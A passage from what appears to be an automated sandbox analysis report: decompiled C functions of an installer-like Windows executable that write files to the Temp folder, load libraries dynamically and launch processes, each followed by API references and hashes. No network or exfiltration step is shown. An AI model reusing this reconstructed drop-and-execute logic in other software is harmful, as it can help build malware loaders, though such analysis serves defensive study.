                        0x0040165b
                        0x00401655
                        0x00402c2d
                        0x00402c39

                        APIs
                          • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,73BCFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                          • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                          • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 1892508949-47812868
                        • Opcode ID: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                        • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                        • Opcode Fuzzy Hash: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                        • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E00401389(signed int _a4) {
                        				intOrPtr* _t6;
                        				void* _t8;
                        				void* _t10;
                        				signed int _t11;
                        				void* _t12;
                        				signed int _t16;
                        				signed int _t17;
                        				void* _t18;
                        
                        				_t17 = _a4;
                        				while(_t17 >= 0) {
                        					_t6 = _t17 * 0x1c +  *0x434f30;
                        					if( *_t6 == 1) {
                        						break;
                        					}
                        					_push(_t6); // executed
                        					_t8 = E00401434(); // executed
                        					if(_t8 == 0x7fffffff) {
                        						return 0x7fffffff;
                        					}
                        					_t10 = E0040136D(_t8);
                        					if(_t10 != 0) {
                        						_t11 = _t10 - 1;
                        						_t16 = _t17;
                        						_t17 = _t11;
                        						_t12 = _t11 - _t16;
                        					} else {
                        						_t12 = _t10 + 1;
                        						_t17 = _t17 + 1;
                        					}
                        					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                        						 *0x433eec =  *0x433eec + _t12;
                        						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0);
                        					}
                        				}
                        				return 0;
                        			}











                        0x0040138a
                        0x004013fa
                        0x0040139b
                        0x004013a0
                        0x00000000
                        0x00000000
                        0x004013a2
                        0x004013a3
                        0x004013ad
                        0x00000000
                        0x00401404
                        0x004013b0
                        0x004013b7
                        0x004013bd
                        0x004013be
                        0x004013c0
                        0x004013c2
                        0x004013b9
                        0x004013b9
                        0x004013ba
                        0x004013ba
                        0x004013c9
                        0x004013cb
                        0x004013f4
                        0x004013f4
                        0x004013c9
                        0x00000000

                        APIs
                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                        • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                        • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                        • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                        • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Window$EnableShow
                        • String ID:
                        • API String ID: 1136574915-0
                        • Opcode ID: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                        • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                        • Opcode Fuzzy Hash: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                        • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405B20(WCHAR* _a4) {
                        				struct _PROCESS_INFORMATION _v20;
                        				int _t7;
                        
                        				0x430270->cb = 0x44;
                        				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                        				if(_t7 != 0) {
                        					CloseHandle(_v20.hThread);
                        					return _v20.hProcess;
                        				}
                        				return _t7;
                        			}





                        0x00405b29
                        0x00405b49
                        0x00405b51
                        0x00405b56
                        0x00000000
                        0x00405b5c
                        0x00405b60

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CloseCreateHandleProcess
                        • String ID:
                        • API String ID: 3712363035-0
                        • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                        • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                        • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                        • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040690A(signed int _a4) {
                        				struct HINSTANCE__* _t5;
                        				signed int _t10;
                        
                        				_t10 = _a4 << 3;
                        				_t8 =  *(_t10 + 0x40a3e0);
                        				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                        				if(_t5 != 0) {
                        					L2:
                        					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                        				}
                        				_t5 = E0040689A(_t8); // executed
                        				if(_t5 == 0) {
                        					return 0;
                        				}
                        				goto L2;
                        			}





                        0x00406912
                        0x00406915
                        0x0040691c
                        0x00406924
                        0x00406930
                        0x00000000
                        0x00406937
                        0x00406927
                        0x0040692e
                        0x00000000
                        0x0040693f
                        0x00000000

                        APIs
                        • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                          • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                          • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                          • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                        • String ID:
                        • API String ID: 2547128583-0
                        • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                        • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                        • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                        • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                        				signed int _t5;
                        				void* _t6;
                        
                        				_t5 = GetFileAttributesW(_a4); // executed
                        				asm("sbb ecx, ecx");
                        				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                        				return _t6;
                        			}





                        0x00406031
                        0x0040603e
                        0x00406053
                        0x00406059

                        APIs
                        • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$AttributesCreate
                        • String ID:
                        • API String ID: 415043291-0
                        • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                        • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                        • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                        • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406008(WCHAR* _a4) {
                        				signed char _t3;
                        				signed char _t7;
                        
                        				_t3 = GetFileAttributesW(_a4); // executed
                        				_t7 = _t3;
                        				if(_t7 != 0xffffffff) {
                        					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                        				}
                        				return _t7;
                        			}





                        0x0040600d
                        0x00406013
                        0x00406018
                        0x00406021
                        0x00406021
                        0x0040602a

                        APIs
                        • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405AEB(WCHAR* _a4) {
                        				int _t2;
                        
                        				_t2 = CreateDirectoryW(_a4, 0); // executed
                        				if(_t2 == 0) {
                        					return GetLastError();
                        				}
                        				return 0;
                        			}




                        0x00405af1
                        0x00405af9
                        0x00000000
                        0x00405aff
                        0x00000000

                        APIs
                        • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                        • GetLastError.KERNEL32 ref: 00405AFF
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CreateDirectoryErrorLast
                        • String ID:
                        • API String ID: 1375471231-0
                        • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                        • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                        • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                        • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004060DF(void* _a4, void* _a8, long _a12) {
                        				int _t7;
                        				long _t11;
                        
                        				_t11 = _a12;
                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                        				if(_t7 == 0 || _t11 != _a12) {
                        					return 0;
                        				} else {
                        					return 1;
                        				}
                        			}





                        0x004060e3
                        0x004060f3
                        0x004060fb
                        0x00000000
                        0x00406102
                        0x00000000
                        0x00406104

                        APIs
                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                        • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004060B0(void* _a4, void* _a8, long _a12) {
                        				int _t7;
                        				long _t11;
                        
                        				_t11 = _a12;
                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                        				if(_t7 == 0 || _t11 != _a12) {
                        					return 0;
                        				} else {
                        					return 1;
                        				}
                        			}





                        0x004060b4
                        0x004060c4
                        0x004060cc
                        0x00000000
                        0x004060d3
                        0x00000000
                        0x004060d5

                        APIs
                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                        • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004034E5(long _a4) {
                        				long _t2;
                        
                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                        				return _t2;
                        			}




                        0x004034f3
                        0x004034f9

                        APIs
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E00401FA4(void* __ecx) {
                        				void* _t9;
                        				intOrPtr _t13;
                        				void* _t15;
                        				void* _t17;
                        				void* _t20;
                        				void* _t22;
                        
                        				_t17 = __ecx;
                        				_t19 = E00402DA6(_t15);
                        				E0040559F(0xffffffeb, _t7);
                        				_t9 = E00405B20(_t19); // executed
                        				_t20 = _t9;
                        				if(_t20 == _t15) {
                        					 *((intOrPtr*)(_t22 - 4)) = 1;
                        				} else {
                        					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                        						_t13 = E004069B5(_t17, _t20);
                        						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                        							if(_t13 != _t15) {
                        								 *((intOrPtr*)(_t22 - 4)) = 1;
                        							}
                        						} else {
                        							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
                        						}
                        					}
                        					_push(_t20);
                        					CloseHandle();
                        				}
                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                        				return 0;
                        			}









                        0x00401fa4
                        0x00401faa
                        0x00401faf
                        0x00401fb5
                        0x00401fba
                        0x00401fbe
                        0x0040292e
                        0x00401fc4
                        0x00401fc7
                        0x00401fca
                        0x00401fd2
                        0x00401fe1
                        0x00401fe3
                        0x00401fe3
                        0x00401fd4
                        0x00401fd8
                        0x00401fd8
                        0x00401fd2
                        0x00401fea
                        0x00401feb
                        0x00401feb
                        0x00402c2d
                        0x00402c39

                        APIs
                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,73BCEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                          • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,73BCEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                          • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                          • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                          • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                          • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                          • Part of subcall function 00405B20: CreateProcessW.KERNELBASE ref: 00405B49
                          • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                          • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
                          • Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32 ref: 004069E8
                          • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
